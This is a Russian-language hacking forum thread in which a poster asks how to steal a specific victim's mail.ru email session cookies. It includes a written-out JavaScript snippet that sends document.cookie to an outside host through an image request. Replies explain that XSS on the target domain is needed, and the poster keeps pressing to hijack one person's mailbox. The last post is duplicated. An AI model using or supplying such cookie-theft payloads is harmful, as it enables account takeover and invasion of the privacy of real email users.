|
Кража куки через клик по ссылке
если я на бесплатном хосте сделаю хтмл страницу с скриптом, который тырит куки
Код HTML:
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>ЗЫ: пишем те, кто уже точно знает! |
В общем случае куки можно получить только в рамках одного домена.
|
смотри, я послал жертве на мейл.ру она открыла ссылку етой странице, у меня буду ее куки от почтового ящика?!
|
не будут
|
так как же можно получить куки, если жертва киликает по ссылки, как? какой скрипт, уже много статей почитал инфы 0!искать xss ето не к етой теме!
|
Ты, видимо, не понимаешь, что куки без xss не своруешь.
|
та бред ети xss, если меня интересует определенное мыло, и xss на нем нету, как кто то же можно угнать куки!!!!!!!
ЗЫ брут бредддддддд! |
Бред говоришь ты.
У тебя есть колеса - этот скрипт. Но нет двигателя XSS Как ты без двигателя толкнешь колеса? Да никак. Xss и используется, чтобы сookie своровать. |
ну вот например в3ять мейл ру, именно почту, а не другие ресурсы, наврядли там есть xss
Зы: 1. пасивная xss что нам дает, с ней моно гнать куки 2. и вообще пасивніе же xss должні прибивать, коль о них много народу знает! |
ну вот например в3ять мейл ру, именно почту, а не другие ресурсы, наврядли там есть xss
Зы: 1. пасивная xss что нам дает, с ней моно гнать куки 2. и вообще пасивніе же xss должны прибивать, коль о них много народу знает! |
| Время: 20:42 |